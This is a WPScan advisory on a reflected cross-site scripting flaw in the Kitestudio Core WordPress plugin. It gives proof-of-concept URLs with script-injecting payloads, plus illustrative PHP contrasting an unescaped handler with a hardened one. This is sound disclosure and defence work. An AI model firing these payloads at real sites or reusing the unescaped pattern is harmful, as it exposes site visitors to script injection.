WPVDB-ID: F56F7244-E8EC-4A87-9419-643BC13B45A0
Published: Jun 15, 2022

Core Plugin for Kitestudio Themes < 2.3.1 - Reflected Cross-Site-Scripting

Author: cydave
Source: wpscan.com

EPSS: 0.001 (Low)
EPSS Percentile: 44.3%

The plugin does not sanitise and escape some request parameters before outputting them back in the response of an AJAX action. The action is reachable by both unauthenticated and authenticated users when a premium theme from the vendor is active, leading to Reflected Cross-Site Scripting.

PoC

Install and activate the dependencies: a premium theme from the vendor (or the teta-lite one) as well as the WooCommerce plugin, then open the URL below as either an unauthenticated or authenticated user.

v < 2.3 (no nonce required):

https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&atts[body_class]="><script>alert(`xss`)</script>

v < 2.3.1 (only works against unauthenticated users, as a nonce is needed):

https://example.com/wp-admin/admin-ajax.php?action=fetch_woocommerce_products_loop&kite_nonce=xxxxx&atts[body_class]="onmouseover=alert(/XSS/)//
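The handler pattern behind the description and PoC above, as an added illustrative example: this is not the Kitestudio Core plugin's own code, and the function names, the `kite_nonce` nonce action name and the markup being emitted are assumptions. It shows an admin-ajax action hooked for both logged-in and logged-out users that reflects `atts[body_class]` into an HTML attribute unescaped, beside a hardened version that checks the nonce, restricts the value to valid class characters with `sanitize_html_class()` and escapes it with `esc_attr()` for the attribute context.

```php
<?php
// Added example, not code from the Kitestudio Core plugin.
// Hypothetical function and nonce names; only the hardened handler is hooked.

// --- Vulnerable pattern (assumed reconstruction of the behaviour the advisory describes) ---
function kite_example_vulnerable_products_loop() {
    $atts       = isset( $_REQUEST['atts'] ) ? (array) wp_unslash( $_REQUEST['atts'] ) : array();
    $body_class = isset( $atts['body_class'] ) ? $atts['body_class'] : '';

    // Attacker-controlled value lands directly inside a double-quoted attribute:
    //   body_class="><script>alert(`xss`)</script>   closes the attribute/tag, injects a script
    //   body_class="onmouseover=alert(/XSS/)//       stays inside the tag, adds an event handler
    echo '<div class="products-loop ' . $body_class . '">';
    // ... product loop output ...
    echo '</div>';
    wp_die();
}
// Registration for the vulnerable handler, shown for contrast only (left unhooked here):
// add_action( 'wp_ajax_fetch_woocommerce_products_loop',        'kite_example_vulnerable_products_loop' );
// add_action( 'wp_ajax_nopriv_fetch_woocommerce_products_loop', 'kite_example_vulnerable_products_loop' );

// --- Hardened handler ---
function kite_example_hardened_products_loop() {
    // The nonce is passed as the `kite_nonce` query argument (as in the PoC); the nonce
    // action name 'kite_nonce' is an assumption. Note that a nonce alone does not fix
    // reflected XSS: logged-out visitors all share the same nonce for a given action,
    // so an attacker can embed a valid one in the link. Output escaping is still required.
    check_ajax_referer( 'kite_nonce', 'kite_nonce' );

    $atts = ( isset( $_REQUEST['atts'] ) && is_array( $_REQUEST['atts'] ) )
        ? wp_unslash( $_REQUEST['atts'] )
        : array();
    $raw = isset( $atts['body_class'] ) ? (string) $atts['body_class'] : '';

    // Allow-list each token to HTML class characters (A-Za-z0-9, '-', '_'), drop empties,
    // then escape for the attribute context. `"><script>` collapses to `script`;
    // `"onmouseover=alert(/XSS/)//` collapses to `onmouseoveralertXSS`, which is inert.
    $classes    = array_filter( array_map( 'sanitize_html_class', preg_split( '/\s+/', $raw ) ) );
    $body_class = esc_attr( implode( ' ', $classes ) );

    echo '<div class="products-loop ' . $body_class . '">';
    // ... product loop output ...
    echo '</div>';
    wp_die();
}
add_action( 'wp_ajax_fetch_woocommerce_products_loop',        'kite_example_hardened_products_loop' );
add_action( 'wp_ajax_nopriv_fetch_woocommerce_products_loop', 'kite_example_hardened_products_loop' );
```

When auditing a plugin for this class of bug, grep for `wp_ajax_nopriv_` registrations and follow every `$_GET`/`$_POST`/`$_REQUEST` read in the hooked callback to its `echo`; any value that reaches markup without an `esc_*()` call appropriate to its context (`esc_attr()` inside attributes, `esc_html()` in text nodes) is reflected XSS regardless of whether a nonce check precedes it.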

CPE
Name               Operator   Version
kitestudio-core    lt         2.3.1
